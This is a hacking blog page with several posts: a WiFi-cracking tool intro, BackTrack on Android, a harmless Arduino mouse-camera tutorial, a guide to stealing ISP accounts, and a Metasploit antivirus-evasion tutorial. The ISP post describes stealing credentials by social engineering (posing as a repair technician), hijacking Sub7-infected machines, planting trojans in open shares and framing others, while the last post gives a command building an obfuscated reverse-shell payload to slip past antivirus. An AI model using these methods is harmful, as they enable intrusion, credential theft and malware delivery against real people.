Thursday, 3 April 2014

WIFI (PASSWORD)-CRACKER ON BACKTRACK 5 R3 USING FERN

Follow The Admin https://www.facebook.com/GogoTheHacker

How to using Fern

nr1
Fern-WiFi-Cracker is a Wireless Penetration Testing Tool written in python.It provides a GUI for cracking wireless networks. Fern Wi-fi cracker automatically run aireplay-ng, airodump-ng and aircrack-ng when you execute Fern-WiFi-Cracker. They are run separately but Fern-WiFi-Cracker  uses the aircrack-ng suite of tools. You can use Fern-WiFi-Cracker  for Session Hijacking or locate geolocation of a particular system based on its Mac address. Before using Fern-WiFi-Cracker make sure that your wireless card supports packet injection.
Read more »
Posted by at 1 comment:
Labels:

How To Install Backtrack In An Android Device - The Easiest Way



Hello guys, today I'm going to show you the easiest way to install backtrack on an android device.
For this tutorial you need:
  • Rooted android device
  • Linux installer (Can be found on Google play)
  • Zarchiver (Can be found on Google play)
  • Busybox (Can be found on Google play)
  • Android-VNC (Can be found on Google play)
  • Terminal  Emulator (Can be found on Google play)
Read more »
Posted by at No comments:
Labels: ,

Monday, 20 January 2014

Convert Optical Mouse into Arduino Web Camera

Optical mouse uses a small camera that records surface to calculate movements of the mouse.
In this tutorial I will show you how to display video signal of this camera in your browser.
The mouse I took apart was an old Logitech RX 250 which contains ADNS-5020 optical sensor.
This sensor records 15x15 pixel images in grayscale. It also calculates X-Y movements of the mouse.
Arduino Web Camera
To get the things running you will need:
- arduino
- ethernet shield
- optical mouse with ADNS-5020 sensor
- 10K ohm resistor

Connect everything together

Make sure that pins (NRESET, NCS, DSIO, SCLK) of the sensor don't connect to anything on the mouse board.
If they do, cut the traces. (I removed the main chip and some resistors to achieve the same thing.)
ADNS-5020 mouse sensor
Solder 10K ohm resistor between NRESET and +5V. Then solder wires (approx. 20cm) to pins NCS, DSIO, SCLK, +5V, GND.
This is a scheme that you should end with:
Arduino ADNS5020 scheme
Put Ethernet shield on arduino and connect it to local network.
Then connect mouse sensor to arduino like this:
+5V -------------- Arduino +5V
GND -------------- Arduino GND
NCS -------------- Arduino digital pin 7
SDIO -------------- Arduino digital pin 6
SCLK -------------- Arduino digital pin 5

Arduino sketch

In the sketch below replace receiverIP value (in my case 192, 168, 1, 102) to IP of your computer.
Then upload the sketch to arduino.
#include <SPI.h>
#include <Ethernet.h>
#include <EthernetUdp.h>

byte arduinoMac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
IPAddress arduinoIP(192, 168, 1, 177); // desired IP for Arduino
unsigned int arduinoPort = 8888;      // port of Arduino

IPAddress receiverIP(192, 168, 1, 102); // IP of udp packets receiver
unsigned int receiverPort = 6000;      // port to listen on my PC

EthernetUDP Udp;

int SCLK = 5;
int SDIO = 6;
int NCS  = 7;

void setup() {
  Serial.begin(9600);
  Ethernet.begin(arduinoMac,arduinoIP);
  Udp.begin(arduinoPort);
  
  pinMode(SCLK, OUTPUT);
  pinMode(SDIO, OUTPUT);
  pinMode(NCS, OUTPUT);
  
  mouse_reset();
  delay(10);
}

void loop() {
  char img[225];
  for (int i=0;i<225;i++){
      img[i]=readLoc(0x0b);
      img[i] &= 0x7F;
      img[i]+=1;//if there is 0 value, part of udp package is lost
      Serial.print(img[i], DEC);
      Serial.print(",");
      delay(2);
  }  
  Serial.println();
  Udp.beginPacket(receiverIP, receiverPort); //start udp packet
  Udp.write(img); //write mouse data to udp packet
  Udp.endPacket(); // end packet

  delay(500);
}

void mouse_reset(){
  // Initiate chip reset
  digitalWrite(NCS, LOW);
  pushbyte(0x3a);
  pushbyte(0x5a);
  digitalWrite(NCS, HIGH);
  delay(10);
  // Set 1000cpi resolution
  digitalWrite(NCS, LOW);
  pushbyte(0x0d);
  pushbyte(0x01);
  digitalWrite(NCS, HIGH);
}

unsigned int readLoc(uint8_t addr){
  unsigned int ret=0;
  digitalWrite(NCS, LOW);
  pushbyte(addr);
  ret=pullbyte();
  digitalWrite(NCS, HIGH);
  return(ret);
}

void pushbyte(uint8_t c){
  pinMode(SDIO, OUTPUT);
  for(unsigned int i=0x80;i;i=i>>1){
    digitalWrite(SCLK, LOW);
    digitalWrite(SDIO, c & i);
    digitalWrite(SCLK, HIGH);
  }
}

unsigned int pullbyte(){
  unsigned int ret=0;
  pinMode(SDIO, INPUT);
  for(unsigned int i=0x80; i>0; i>>=1) {
    digitalWrite(SCLK, LOW);
    ret |= i*digitalRead(SDIO);
    digitalWrite(SCLK, HIGH);
  }
  pinMode(SDIO, OUTPUT);
  return(ret);
}

Open serial window and you should see data flow from mouse:
Serial window

Install Node.js and Socket.IO

To display data in browser we need to have node.js and socket.io installed on computer.
Install node.js from here: nodejs.org then go to windows command prompt and run: 
npm install socket.io

Node.js and and website code

In the code below we configure node.js to listen to udp traffic from arduino, send all data to browser with socket.io and setup a basic web server.
var dgram = require("dgram");
var server = dgram.createSocket("udp4");

var io = require('socket.io').listen(8000); // server listens for socket.io communication at port 8000
io.set('log level', 1); // disables debugging. this is optional. you may remove it if desired.

server.on("message", function (msg, rinfo) { //every time new data arrives do this:
  //console.log("server got: " + msg + " from " + rinfo.address + ":" + rinfo.port); 
  //console.log("server got:" + msg); 
  io.sockets.emit('message', msg);
});

server.on("listening", function () {
  var address = server.address();
  console.log("server listening " + address.address + ":" + address.port);
});

server.bind(6000); //listen to udp traffic on port 6000

var http = require("http"),
    url = require("url"),
    path = require("path"),
    fs = require("fs")
    port = process.argv[2] || 8888;

http.createServer(function(request, response) {

  var uri = url.parse(request.url).pathname
    , filename = path.join(process.cwd(), uri);

  var contentTypesByExtension = {
    '.html': "text/html",
    '.css':  "text/css",
    '.js':   "text/javascript"
  };

  fs.exists(filename, function(exists) {
  
 if(!exists) {
      response.writeHead(404, {"Content-Type": "text/plain"});
      response.write("404 Not Found\n");
      response.end();
      return;
    }
 
    if (fs.statSync(filename).isDirectory()) filename += '/index.html';

    fs.readFile(filename, "binary", function(err, file) {
      var headers = {};
      var contentType = contentTypesByExtension[path.extname(filename)];
      if (contentType) headers["Content-Type"] = contentType;
      response.writeHead(200, headers);
      response.write(file, "binary");
      response.end();
    });
  });
}).listen(parseInt(port, 10));

console.log("Static file server running at\n  => http://localhost:" + port + "/\nCTRL + C to shutdown");
Just save the code as: code.js
Now we need to create a website which will convert data from socket.io into 15x15 image.
This is it:
<html>
<head>
 <style>
  #wrapper { width:300px; height:300px; }
  div div { width:20px; height:20px; float:left; }
 </style>
 <script type="text/javascript" src="//localhost:8000/socket.io/socket.io.js"></script>
 <script>
  var socket = io.connect('http://localhost:8000');
  socket.on('connect', function () {
   socket.on('message', function (msg) {
    document.getElementById('wrapper').innerHTML = '';
    for (var i = 0; i < 225; i++) {
     pixDraw(Math.round((msg[i])*2.4));
    }
   });
  }); 
  function pixDraw(clr) {
   var pixDiv = document.createElement('div');
   pixDiv.style.backgroundColor = "rgb("+clr+","+clr+","+clr+")";
   document.getElementById("wrapper").appendChild(pixDiv);
  }
 </script>
</head>
<body>
 <div id="wrapper"></div>
</body>
</html>
Save it as index.html

Run it!

If you are on windows then just download zip file below and run the runme.bat file.
If you are on linux then run the command node code.js in the shell.
Now open the address http://localhost:8888/ in a web browser and you should see a realtime image from mouse:
video in browser

Video

Download files

All files are in this zip: mousecamera.zip
Posted by at No comments:
Labels:

Friday, 17 January 2014

Stealing ISP Accounts !!!!!



Disclaimer :- Any Misuse Of This tutorial can lead you to jail.Try It At Your Own Risk. Underground Hackers World Will Not be Responsible for any misuse of this Tutorial.

This Tutorial is For Educational Purpose Only

Why would you want a stolen ISP account u ask?? well there are two reasons, you are too poor to afford the local phone companies bull shit prices or you need an easier and faster platform to hack from than five proxies and three wingates, well here is your answer. Remember there is no point in going out and hacking your local ISP to get an account, the easier the better is my suggestion.

Now firstly you may be reading this at school or from somewhere and you dont have access at home so now i will show you some of the method's i have used to gain accounts. This Tutorial Is Posted By Underground Hackers and if you found this tutorial without this messages let us know the copycats in inbox or mail us at UGHW@hackermail.com.One of the most simple method's is to go to a local shop and find a computer on dialup access, then simply run a password snatcher on it such as WASP and then emailing all the information outside where you can process it, this method is relatively simple and if you get caught they just chuck you out of the store. These accounts are normally only good for night access, we want 24/7 access. One method i have found works is ringing up the local ISP and asking to purchase an account, say you are in a rush but make sure you dont sound fake, they normally say "here is your internet username and password, we will send out the information for you to send back blah blah blah..." now of course you have to make sure you call without Caller ID active, if you live in Australia just prefix your number with 1831. This method can be rather annoying and normally doesn't work, but it is worth a try and the account normally last's for a few weeks. My favorite method is one of great effort but also great reward, find a local computer store that is overpriced and offers all that extended warranty crap, now get yourself a shit and screen print their logo on it, now get a list of people who purchase computers from there, or just follow people home. Now that we have five or six people who are stupid enough to pay 600% of the price for a computer than they should, go around there houses and pose as a computer repair guy sent out from the store, say something like, this is part of the extended life warranty you purchased with your computer, we are just performing a regular checkup as we have had a few problems with your model of computer. nine times out of ten they will let you straight through the door without even asking any questions to do with abacus, just the mere thought of their overpriced piece of crap not working makes them do whatever you want, now when you are in just run a program through there computer and snatch there internet accounts, it doesnt matter who they are for, just the we will get more later with these ones. Make sure you stay for an hour or so and run scandisk and defrag to make it look real. Now unless you are really stupid you should have around five or six internet accounts.

Now when you dial up to them make sure you turn of Caller ID, this is what stop's you from being pinned straight away, check the person's email and remove any multiple logging reports and make sure you change internet accounts ATLEAST once a week and never use the old one again, give it to some lamer over the net and let them get in trouble for your hack's. You should be on the net by now, but to change accounts once a week we really need more accounts, i hate to say it but the easiest way to get more accounts in by using winblows, so fire up winblows and ignore all the illegal operation crap and download the following program's:

Legion - Open Share Scanner

Sub 7 Defcon edition

Sub 7 2.2

mIRC

Now open up mIRC and go to a local area's channel, /whois a few people until you find the isp you like.

Infinity is freestyler@12-237-182-191.client.attbi.com * BoMFunk Mc'S

So we have made our choice, attbi.com reveal ATT&T, now do a /dns on 12-237-182-191.client.attbi.com as this is his host.

*** Resolved 12-237-182-191.client.attbi.com to 12.237.182.191

Now convert this into a class B network and we have 12.237.0.0, this is our target, open up Sub 7 2.2 and goto Connection > Scanner > Local Scanner. Put the Start ip as 12.237.0.0 and the end ip as 12.237.255.255, then click scan. This will take quite a while, now when you get a result open up Sub 7 Defcon and put it in the field up the top and click connect. If you get asked for a password then dont bother with this IP, but if it comes up with connected at the bottom we are in business. First thing you should do is goto Advanced > Passwords > Retrieve RAS Passwords, this is there internet username and password aswell as phone number, make sure you get you local phone number from the ISP's site. Next goto Connection > Server Options and set a password, we don't want other people getting on the net while we are hacking and kicking us off. Turn on IP Notify as well so that you can get this server to do remote scan's for you if needed, ISP's sometimes check for people who scan and bust their ass.

To anyone who says using Sub 7 is a lame way to get accounts, i agree but i would rather this way than hacking my local ISP and getting put in jail before i even get to my target. You ask why you use Sub 7 2.2 just for scanning?? well its a better scanner than Defcon, but it doesn't allow IRC bots or IP Notify.

The Next way to gain accounts is to find open shares and upload a trojan. To do this open up legion scanner and do a scan of the same range as you did with sub 7, expect do it in small ammounts like 203.48.0.0 - 203.48.5.255,when it comes up with a result go into my computer and change the address to \\ and then the ip, so for example \\203.48.15.123 then wait for it to load, you might get asked for a password, if so ignore this ip and continue scanning, if you dont get a password, have a look at the names, look for the C drive if it is there and go into it, then go into windows > start menu > programs > startup, and paste a trojan server in here, make sure it doesnt come up with a prompt and that it will notify you when they get on the net next. All you have to do now is wait, within a few day's you should be able to get atleast 20-30 accounts, if not around 50. This should last for a long time and you can do anything you want with them. Just remember to disable Caller ID and to change accounts every week atleast.

DO NOT fuck with the person you get the account from, keep your stealth and don't advertise the fact you don't pay for internet, or the fact you hack from other peoples accounts.


Follow The Admin :- https://www.facebook.com/GoGoTheHacker
Blogger :- http://undergroundhackersworld.blogspot.in/
Youtube :- https://www.youtube.com/channel/UChV8z4YOx5OVIMepZhOx19Q
Twitter :- https://twitter.com/UGHackersWorld
Posted by at No comments:
Labels:

How to Change the Signature of Metasploit Payloads to Evade Antivirus Detection



HOW TO CHANGE THE SIGNATURE OF METASPLOIT PAYLOADS

In this tutorial, we will take a more in-depth look at this command and
its capabilities for re-coding our payloads. A quick note before we get
started.
Find out what AV software the target system is using and re-encode to
evade that AV package. No re-encoding scheme will work with all AV
software, so don't waste time developing a new encoding scheme that
works with your AV software, but may not evade the target system's
AV software.
So, let's open up BackTrack and fire up Metasploit!!!

STEP 1: USE MSFENCODE
Let's begin by simply typing msfencode at our prompt with the -h
switch for help.
msfencode -h
As you will see, all the key switches that we can use with
this command. Note the -e switch. This designates the encoder we
want to use to re-encode our payload.
Also, note the section with the -t switch. This
switch determines what the output format is. You can see there are
numerous formats including raw, ruby, perl, java, exe, vba, vbs, etc.
Each of these outputs gives us an opportunity to change the signature
and attempt to evade the AV software.

STEP 2: LIST THE ENCODING SCHEMES
Next, let's look at what encoders are available in msfencode.
msfencode -l
As the next screen shows, msfencode includes numerous different
encoding schemes. Fourth from the bottom we see "shikata_ga_nai."
Note that it is rated "excellent" and it's a "Polymorphic XOR Additive
Feedback Encoder." Let's take a look at that one.

WHAT'S THAT STRANGE SOUNDING ENCODER?
First, this strange sounding shikata_ga_nai encoder is a Japanese
phrase that loosely translates to "nothing can be done about it." An
excellent name for an encoder with bad intentions!
Second, it's an additive XOR polymorphic encoder. Without going into
too much detail, this means that it will change its shape/signature
(polymorphic), by using an XOR encrypting scheme. XOR is far from a
perfect encryption scheme, but it's efficient and can generate multiple
shapes/signatures quickly that can then be decrypted by the code
itself once it arrives at the target.

STEP 3: RE-CODE OUR PAYLOAD
Now, let's use shikata_ga_nai to re-encode our reverse TCP shell to
get it past AV software. At the command prompt in BackTrack, type:
msfpayload windows/shell/reverse_tcp LHOST
192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c
20 -t vbs > /root/AVbypass.vbs

THE BREAKDOWN
Let's take this command apart and see what it does.
msfpayload windows/shell/reverse_tcp LHOST
192.168.1.101 R
The above part creates a payload with the reverse TCP shell for a local
host at 192.168.1.101.
The "|"
This symbol means pipe that payload to the following command.
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Means re-encode that payload with skikata_ga_nai and run it 20 times
(-c 20), and then encode it to look like a .vbs script.
> /root/AVbypass.vbs
Means send the newly encoded payload to a file in the /root directory
and name it AVbypass.vbs so that it appears to be a .vbs script.

THE RESULT
When we run this command, we get the following output showing us
that shikata_ga_nai is running our payload through 20 iterations (-c
20).
Now let's go to the directory we told shikata_ga_nai to send our newly
encoded payload to and check to see whether it is there.
cd /root
ls -l
As you will see, we now have a file in our root directory called
AVbypass.vbs that we can now test against the target's AV software to
see whether it detects it. This method works in most cases, but if it
doesn't, simply send the payload through various number of iterations
until you find an encoding that the AV software does not detect.

Follow The Admin :- https://www.facebook.com/GoGoTheHacker
Blogger :- http://undergroundhackersworld.blogspot.in/
Youtube :- https://www.youtube.com/channel/UChV8z4YOx5OVIMepZhOx19Q
Twitter :- https://twitter.com/UGHackersWorld

Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)